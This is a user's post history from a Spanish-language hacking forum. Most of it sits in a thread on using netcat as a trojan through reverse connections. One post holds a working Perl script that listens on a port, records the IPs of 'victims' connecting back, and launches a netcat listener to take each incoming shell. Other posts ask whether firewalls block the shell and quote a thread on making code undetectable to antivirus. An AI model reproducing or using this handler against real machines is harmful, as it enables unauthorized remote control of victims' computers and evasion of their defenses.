elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Abril negro / Re: Clase EncryptApi (Haz tus códigos indetectables fácilmente) en: 1 Junio 2009, 15:46 pm
[quote author=E0N link=topic=255039.msg1234972#msg1234972
Así que abrimos con nuestro debugger favorito la dll en cuestión, nos vamos a esa dirección y nos fijamos en el número de bytes completos que podemos elegir, es decir, si la primera instrucción ocupa 5 bytes elegimos ese valor, en ningún caso se puede partir por la mitad una instrucción, pues el programa no funcionaría.
[/quote]

Alguien intento abrir una dll?

La mayoria de los debuggers que tengo no pueden abrir las dll  :-\

UPDATE: Tengo una version vieja de OllyDB, por eso no me admite las Dlls, col la nueva sirve  ;-)
2  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Mayo 2008, 16:04 pm
Yo programo en C pero no se utilizar los Sockets,
por eso hize un programa en Perl, porque me parecia mas facil.
El problema es que llevo 5 dias "leyendo" el Perl (pues.. empeze desde zero)
por eso no soy muy pratico y programando casi siempre en C, no me doy cuenta de algunas cosas (por ejemplo utilizando el for y no el foreach).
Si alguien puede mejorar el codigo que lo haga,
simplemente necesitaba algo para no cambiar puerto cada vez y mi intento era ver los ip de las victimas y conectarme una a una.

Citar
Al reves, el problema de no utilizar fork es que si intentas escuchar con varias victimas no podrás hacerlo, solo una a la vez hasta que finalice la ejecucion de system por salir nc de su ejecucion

Mi llamada de sistema es un start, osea abre otra ventana, entoces el system acaba en un Clock.


Citar
a demas de my $temp=<STDIN>, que te dejara un fin de línea, si no me equivoco.

si pero eso no influje sobre la convercion, hize pruebas.

Citar
se usaria un foreach porque el objetivo es recorrer el array. Por ultimo podrias evaluar el uso de matrices asociadas (en jerga perlera: Hashes) para simplificar el logging de las conexiones.

de eso no me di quenta, pero no es fondamental.
[voy a leerme algo sobre los hashes  ;D]

Gracias por tus comentarios, se vee que tienes experiencia pero soy un newbee del perl.
3  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Mayo 2008, 12:41 pm
Tiene un pequenito problema.
Si por ejemplo no tienes victimas que intentan conectarse el programa espera un tempo infinito. (pq no se utilizar los Forks)
4  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Mayo 2008, 12:36 pm
Wueno, acabo de hacer un Programa en Perl para "eschuchar" una puerta y ver los IP que intentan conectarse.
Despues el programa llama el netcat con estos parametros:
" start nc -L -vv -p "puera" -n "IP"
Si NO tienes el netcat en System32 no sirve
Si tienes el Netcat en system32 pero no se llama  nc.exe no sirve igual (entonces tienes que correger el nombre)
Para ejecutar ese programa tienes que instalar un interprete Perl (Active Perl o lo que sea) y poner sobre la consola "perl NombrePrograma.pl puerta"
Aqui le dejo el programa:
Código:
#!/usr/bin/perl

use IO::Socket;


my $port = shift or die "Uso: $0 <puerta>\n";



while(1){

system("cls");
 
print "\nInserta cuantos minutos quieres escuchar: ";

my $servsock = new IO::Socket::INET(
        LocalPort => $port,
        Proto => 'tcp',
        Listen => 1,
        Reuse => 1,
) or die "Impossible crear el socket: $!\n";

my $temp=<STDIN>;
my $temp2=$temp*60;

$data=(time()+$temp2);

print "\nEscuchando sobre la puerta ".$port."...\n";


$c=0;

while ($data >= (time())){
 
  $f=0;

  my $sock=$servsock->accept();

    for ($i=0;$i<$c;$i++){
      if ($sock->peerhost()==$DB[$i]){
         $f=1;
      }
    }
   
    if ($f==0){
      push (@DB,$sock->peerhost());
      $c++;
    }
  close ($sock);
}
chomp($temp);
close($servsock);
print "\nEn estos ".$temp."minutos, los IP que intentaron conectarse son:\n";

my $sis;

for ($i=0;$i<$c;$i++){
  $temp2=$i+1;
  print "\n";
  print $temp2;
  print "-";
  print $DB[$i];
}
my $scelta= "s\n";

while ($scelta eq "s\n"){
print "\n\nInserta el numero (indice) del ip que quieres hacer conectar:";
$temp=<STDIN>;
chomp ($temp);
$temp=$temp-1;
$sis="start nc -L -vv -p ".$port." -n ".$DB[$temp];
print $sis;
system ($sis);
print "\nQuieres hacer conectar otro IP? (s/n):";
$scelta=<STDIN>;
}
for ($i=0;$i<$c;$i++){
pop(@DB);
}
}
5  Seguridad Informática / Hacking / Re: Jugando con netcat en: 18 Mayo 2008, 14:30 pm
Hola a todos,
Quiero saber el punto de la situacion sobre el utilizar el NetCat como trojan  (estas preguntas son para el netcat en modo "reverse conection").
 
 -El unico que bloquea el netcat puede ser un Firewall, verdad?
 -Existe un server del netcat para ver quales IP intentan conectarse en un puerto de tu computadora?
 -Si la victima tiene un firewall (como el Kaspersky... osea No Windows) bloquea la shell?

Mis pruebas acabaron con exito tambien cuando el firewall de windows estaba activo.


P.S sorry por el espanol... soy italiano, pero creo que me explique xD
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines